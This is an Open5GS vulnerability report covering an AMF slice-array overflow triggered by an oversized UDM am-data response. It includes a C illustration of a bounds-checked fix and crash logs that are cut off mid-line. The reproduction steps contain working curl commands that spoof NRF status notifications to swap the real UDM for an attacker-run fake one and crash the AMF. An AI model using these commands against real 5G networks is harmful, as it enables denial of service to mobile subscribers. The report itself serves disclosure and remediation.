### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AMF aborts during a real UE registration flow when the `Nudm_SDM` `am-data`
response contains too many `nssai.defaultSingleNssais` entries.
This path is UE-driven: the crash is only reached after an external UE starts a
normal 5G registration procedure and AMF performs:
```text
PUT /nudm-uecm/v1/{supi}/registrations/amf-3gpp-access
GET /nudm-sdm/v2/{supi}/am-data
GET /nudm-sdm/v2/{supi}/smf-select-data
GET /nudm-sdm/v2/{supi}/ue-context-in-smf-data
POST /nudm-sdm/v2/{supi}/sdm-subscriptions
```
inside the registration state machine.
The root cause starts in `amf_nudm_sdm_handle_provisioned()`:
```c
DefaultSingleNssaiList = NSSAI->default_single_nssais;
if (DefaultSingleNssaiList) {
    OpenAPI_list_for_each(DefaultSingleNssaiList, node) {
        ogs_slice_data_t *slice = &amf_ue->slice[amf_ue->num_of_slice];
        ...
        amf_ue->num_of_slice++;
    }
}
```
at `../src/amf/nudm-handler.c:95-116`.
The destination array has fixed size `OGS_MAX_NUM_OF_SLICE == 8`:
```c
ogs_slice_data_t slice[OGS_MAX_NUM_OF_SLICE];
```
at `../src/amf/context.h:523` with the macro defined in
`../lib/proto/types.h:137`.
There is no bounds check while copying the attacker-controlled
`defaultSingleNssais` entries into `amf_ue->slice[]`. In the confirmed run, the
memory corruption reached the next stage of the registration flow and tripped a
defensive assertion in `gmm_state_registered`:
```c
ogs_assert(amf_ue->num_of_slice <= OGS_MAX_NUM_OF_SLICE);
```
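To make the missing check concrete, the following is an added, self-contained example and not Open5GS code: it models the `am-data` slice copy from `amf_nudm_sdm_handle_provisioned()` with a capacity check in front of the write loop. `snssai_t`, `nssai_node_t`, the trimmed `amf_ue_t` and `make_list()` are simplified stand-ins for `ogs_slice_data_t`, the `OpenAPI_list_t` nodes and the real UE context (assumptions, not the project's types); `OGS_MAX_NUM_OF_SLICE` is the value the report quotes. The check measures the untrusted list first and refuses a response with more entries than `slice[]` holds, so the caller can reject the subscription data instead of tripping the later `ogs_assert` in `gmm_state_registered`.

```c
/* Added illustration, not Open5GS source: bounded copy of
 * defaultSingleNssais into a fixed-size slice array.
 * Types and helpers are stand-ins (assumptions) for the real ones. */
#include <stdio.h>
#include <stdlib.h>

#define OGS_MAX_NUM_OF_SLICE 8          /* value quoted in the report */

/* Stand-in for the S-NSSAI carried by one defaultSingleNssais entry. */
typedef struct {
    int sst;
    int sd;                             /* -1 when the SD is absent */
} snssai_t;

/* Stand-in for a parsed OpenAPI list node (one per JSON array element). */
typedef struct nssai_node {
    snssai_t *data;
    struct nssai_node *next;
} nssai_node_t;

/* Stand-in for the part of amf_ue_t the copy touches. */
typedef struct {
    snssai_t slice[OGS_MAX_NUM_OF_SLICE];   /* fixed-size destination */
    int num_of_slice;
} amf_ue_t;

/*
 * Copy the UDM-supplied list into amf_ue->slice[] without overrunning it.
 * Returns the number of slices stored, or -1 when the response carries
 * more entries than the context can hold; on -1 the context is left
 * untouched so the caller can reject the am-data response.
 */
int copy_default_single_nssais(amf_ue_t *amf_ue, const nssai_node_t *list)
{
    int count = 0;
    const nssai_node_t *node;

    /* Pass 1: size the untrusted list before writing anything. */
    for (node = list; node; node = node->next)
        count++;
    if (count > OGS_MAX_NUM_OF_SLICE)
        return -1;

    /* Pass 2: the copy the original loop performs, now known to fit. */
    amf_ue->num_of_slice = 0;
    for (node = list; node; node = node->next) {
        snssai_t *slice = &amf_ue->slice[amf_ue->num_of_slice];
        if (!node->data)                /* tolerate a null array element */
            continue;
        slice->sst = node->data->sst;
        slice->sd = node->data->sd;
        amf_ue->num_of_slice++;
    }
    return amf_ue->num_of_slice;
}

/* Constructed input: n identical entries (sst=1, no SD), mirroring the
 * report's "32 identical defaultSingleNssais" case. */
nssai_node_t *make_list(int n)
{
    nssai_node_t *head = NULL, *tail = NULL;
    for (int i = 0; i < n; i++) {
        nssai_node_t *node = calloc(1, sizeof(*node));
        node->data = calloc(1, sizeof(*node->data));
        node->data->sst = 1;
        node->data->sd = -1;
        if (tail)
            tail->next = node;
        else
            head = node;
        tail = node;
    }
    return head;
}

void free_list(nssai_node_t *list)
{
    while (list) {
        nssai_node_t *next = list->next;
        free(list->data);
        free(list);
        list = next;
    }
}

/* Run the bounded copy against a fresh context with n entries and
 * return its result (-1 = rejected, otherwise the stored count). */
int simulate_am_data(int n)
{
    amf_ue_t ue = {0};
    nssai_node_t *list = make_list(n);
    int rc = copy_default_single_nssais(&ue, list);
    free_list(list);
    return rc;
}

int main(void)
{
    printf("1 entry    -> %d\n", simulate_am_data(1));
    printf("8 entries  -> %d\n", simulate_am_data(8));
    printf("32 entries -> %d\n", simulate_am_data(32));
    return 0;
}
```

The two-pass shape matters: checking `num_of_slice < OGS_MAX_NUM_OF_SLICE` inside the loop and silently dropping the rest would also stop the overflow, but it would leave the UE registered with a truncated slice set; refusing the whole response keeps the AMF's view consistent with what the UDM actually provisioned.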
This is not a duplicate of the existing AMF reports under `report/amf/`. It is
a different entry chain, different trust boundary, and different crash site
from the `namf-*`, `nnrf-*`, and newly confirmed `gpsis` overflow issue.
### Root cause
- Entry chain:
  external UE registration
  -> AMF `PUT /nudm-uecm/.../amf-3gpp-access`
  -> AMF `GET /nudm-sdm/v2/{supi}/am-data`
  -> `amf_nudm_sdm_handle_provisioned()`
  -> later registration-state validation
- Root-cause write site:
  `../src/amf/nudm-handler.c:95-116`
- Crash site:
  `gmm_state_registered: Assertion 'amf_ue->num_of_slice <= OGS_MAX_NUM_OF_SLICE' failed`
- Root cause family:
  fixed-size array overflow / state corruption followed by assertion abort
- Controlling field:
  `AccessAndMobilitySubscriptionData.nssai.defaultSingleNssais`
### Steps to Reproduce
1. Start the Open5GS Docker lab and ensure these containers are running:
```bash
docker start db ausf udm udr pcf smf upf amf nssf
```
2. Confirm the subscriber exists in MongoDB. In my live run, the existing test
subscriber was:
```text
IMSI: 001011234567891
```
3. Start a real gNB and UE with the bundled UERANSIM configs:
```bash
docker run --rm -d --name amf-audit-gnb --network open5gs \
--network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run --rm -d --name amf-audit-ue --network open5gs \
--network-alias ue.ueransim.org \
--cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
4. Start the fake UDM helper on the host:
```bash
node /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.js
```
5. Replace the real UDM in AMF's local cache with the fake UDM:
```bash
AMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' amf)
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \
-H 'content-type: application/json' \
--data '{"event":"NF_DEREGISTERED","nfInstanceUri":"http://nrf.open5gs.org/nnrf-nfm/v1/nf-instances/4568f3be-3644-41f1-bff0-3b335fd843b5"}'
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \
-H 'content-type: application/json' \
--data '{"event":"NF_REGISTERED","nfInstanceUri":"http://10.33.33.1:18083/nnrf-nfm/v1/nf-instances/fake-udm-amf","nfProfile":{"nfInstanceId":"fake-udm-amf","nfType":"UDM","nfStatus":"REGISTERED","fqdn":"fake-udm-amf.local","ipv4Addresses":["10.33.33.1"],"allowedNfTypes":["SCP","AMF","SMF","AUSF"],"priority":0,"capacity":100,"load":0,"nfServices":[{"serviceInstanceId":"fake-udm-ueau","serviceName":"nudm-ueau","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AUSF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-uecm","serviceName":"nudm-uecm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-sdm","serviceName":"nudm-sdm","versions":[{"apiVersionInUri":"v2","apiFullVersion":"2.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0}]}}'
```
6. Control experiment: configure the fake UDM for a single normal
`defaultSingleNssai`, then restart `gnb` and `ue` and wait for successful
registration:
```bash
printf 'control\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
docker restart amf-audit-gnb amf-audit-ue
docker logs --tail 60 amf-audit-ue
docker inspect -f '{{.State.Status}} {{.State.ExitCode}}' amf
```
In the confirmed control run, the fake UDM received the full `am-data`,
`smf-select-data`, `ue-context-in-smf-data`, and `sdm-subscriptions` sequence,
and the UE completed registration plus PDU session establishment.
7. Malicious experiment: change only the fake UDM mode so `am-data` returns
`32` identical `defaultSingleNssais`, then restart `gnb` and `ue` again:
```bash
printf 'am-data-slice-overflow\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
docker restart amf-audit-gnb amf-audit-ue
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
docker logs --tail 120 amf
```
### Logs
Control UE result:
```text
Initial Registration is successful
PDU Session establishment is successful PSI[1]
```
Control AMF state:
```text
running 0
```
Malicious evidence from the fake UDM:
```text
2026-04-12T08:16:58.089Z PUT /nudm-uecm/v1/imsi-001011234567891/registrations/amf-3gpp-access mode=am-data-slice-overflow body={...}
2026-04-12T08:16:58.092Z GET /nudm-sdm/v2/imsi-001011234567891/am-data?... mode=am-data-slice-overflow body=<empty>
2026-04-12T08:16:58.093Z GET /nudm-sdm/v2/imsi-001011234567891/smf-select-data?... mode=am-data-slice-overflow body=<empty>
2026-04-12T08:16:58.094Z GET /nudm-sdm/v2/imsi-001011234567891/ue-context-in-smf-data?... mode=am-data-slice-overflow body=<empty>
2026-04-12T08:16:58.095Z POST /nudm-sdm/v2/imsi-001011234567891/sdm-subscriptions mode=am-data-slice-overflow body={...}
```
Container state after the malicious response:
```text
exited 134 2026-04-12T14:39:40.15931599Z 0
```
AMF logs:
```text
04/12 14:39:05.172: [gmm] INFO: V-SMF Instance [45a89546-3644-41f1-bcd4-3da7206b6e6f](LIST) (../src/amf/gmm-handler.c:1496)
04/12 14:39:05.172: [gmm] INFO: [45a89546-3644-41f1-bcd4-3da7206b6e6f] Setup NF Instance [type:SMF] (../src/amf/gmm-handler.c:1498)
04/12 14:39:05.172: [gmm] INFO: V-SMF Instance [45a89546-3644-41f1-bcd4-3da7206b6e6f] (../src/amf/gmm-handler.c:1508)
04/12 14:39:05.172: [gmm] INFO: V-SMF discovered in Non-Roaming or LBO-Roaming[0] (../src/amf/gmm-handler.c:1577)
04/12 14:39:05.172: [gmm] INFO: nsmf_pdusession [1:0x55c81e563310:(nil)] (../src/amf/gmm-handler.c:1617)
04/12 14:39:05.178: [amf] INFO: Setup NF EndPoint(fqdn) [smf.open5gs.org:0] (../src/amf/nsmf-handler.c:140)
04/12 14:39:05.178: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.6:80] (../src/amf/nsmf-handler.c:140)
04/12 14:39:05.188: [amf] INFO: [imsi-001011234567891:1:11][0:0:NULL] /nsmf-pdusession/v1/sm-contexts/{smContextRef}/modify (../src/amf/nsmf-handler.c:954)
04/12 14:39:39.130: [amf] INFO: gNB-N2[10.33.33.13] connection refused!!! (../src/amf/amf-sm.c:1013)
04/12 14:39:39.131: [amf] INFO: [Removed] Number of gNBs is now 0 (../src/amf/context.c:1305)
04/12 14:39:39.132: [amf] INFO: [Removed] Number of gNB-UEs is now 0 (../src/amf/context.c:2784)
04/12 14:39:39.132: [amf] INFO: [imsi-001011234567891:1:51][0:0:NULL] /nsmf-pdusession/v1/sm-contexts/{smContextRef}/modify (../src/amf/nsmf-handler.c:954)
04/12 14:39:39.446: [amf] INFO: gNB-N2 accepted[10.33.33.13]:51067 in ng-path module (../src/amf/ngap-sctp.c:113)
04/12 14:39:39.446: [amf] INFO: gNB-N2 accepted[10.33.33.13] in master_sm module (../src/amf/amf-sm.c:953)
04/12 14:39:39.455: [amf] INFO: [Added] Number of gNBs is now 1 (../src/amf/context.c:1277)
04/12 14:39:39.456: [amf] INFO: gNB-N2[10.33.33.13] max_num_of_ostreams : 10 (../src/amf/amf-sm.c:1000)
04/12 14:39:39.790: [amf] INFO: InitialUEMessage (../src/amf/ngap-handler.c:461)
04/12 14:39:39.790: [amf] INFO: [Added] Number of gNB-UEs is now 1 (../src/amf/context.c:2777)
04/12 14:39:39.790: [amf] INFO: RAN_UE_NGAP_ID[1] AMF_UE_NGAP_ID[5] TAC[1] CellID[0x10] (../src/amf/ngap-handler.c:622)
04/12 14:39:39.790: [amf] INFO: [suci-0-001-01-0000-0-0-1234567891] known UE by SUCI (../src/amf/context.c:1910)
04/12 14:39:39.790: [gmm] INFO: Registration request (../src/amf/gmm-sm.c:1670)
04/12 14:39:39.790: [gmm] INFO: [suci-0-001-01-0000-0-0-1234567891] SUCI (../src/amf/gmm-handler.c:183)
04/12 14:39:39.804: [amf] INFO: [imsi-001011234567891:1] Release SM context [204] (../src/amf/amf-sm.c:614)
04/12 14:39:39.804: [amf
```